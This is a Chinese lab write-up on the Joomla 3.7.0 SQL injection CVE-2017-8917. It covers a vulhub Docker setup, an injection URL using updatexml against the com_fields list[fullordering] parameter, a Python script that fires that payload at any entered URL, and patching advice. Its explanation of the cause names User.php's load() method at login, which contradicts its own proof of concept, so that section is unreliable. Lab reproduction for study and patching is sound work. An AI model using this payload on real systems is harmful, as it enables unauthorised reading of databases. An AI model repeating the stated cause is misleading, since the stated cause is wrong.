1 漏洞概述

Joomla是一个基于PHP的内容管理系统（CMS），广泛应用于各类网站。2017年，Joomla 3.7.0版本被发现存在SQL注入漏洞（CVE-2017-8917），攻击者可以利用该漏洞对数据库进行未授权查询或操作，可能导致数据泄露、篡改甚至删除。

2 影响范围

• Joomla 3.7.0版本

3 漏洞原理

该漏洞主要源于Joomla 3.7.0版本中对用户输入处理不当，导致攻击者可以在特定条件下向SQL查询中注入恶意代码。具体来说，漏洞存在于libraries/src/User/User.php文件中的load()方法，当用户登录时，会调用此方法来加载用户信息。然而，该方法未能充分过滤用户输入，从而导致了SQL注入的发生。

4 vulhub靶场搭建

进入漏洞文件
cd vulhub/joomla/CVE-2017-8917
部署漏洞环境
docker compose up -d
查看漏洞端口
docker compose PS

启动后访问http://192.168.135.132:8080即可看到Joomla的安装界面和测试数据。

5 漏洞复现

直接访问http://192.168.135.132:8080/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,user()),1)，即可看到SQL报错信息

6编写python脚本探测漏洞

#!/usr/bin/env python
​
import requests
from urllib.parse import urljoin
​
def joomla3_sql(url):
    payload = urljoin(url, '/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,user()),1)')
​
    response = requests.get(url=payload, verify=False)
​
    if 'XPATH syntax error' in response.text:
        print("漏洞存在")
    else:
        print("漏洞不存在")
​
if __name__ == '__main__':
    print("注意：本代码仅用于实验和学习目的，请谨慎使用。")
    url = input("请输入目标 URL: ")
    joomla3_sql(url)

结果

7 修复建议

为了防范此漏洞，建议采取以下措施：

1. 升级到最新的Joomla版本，及时修补官方已知的漏洞；

2. 限制用户输入，对所有用户提交的数据进行严格的过滤和验证；

3. 使用安全的编程实践，遵循最佳安全指南，以防止类似漏洞的出现；

4. 定期对网站进行安全审计，检查是否存在其他潜在的安全风险。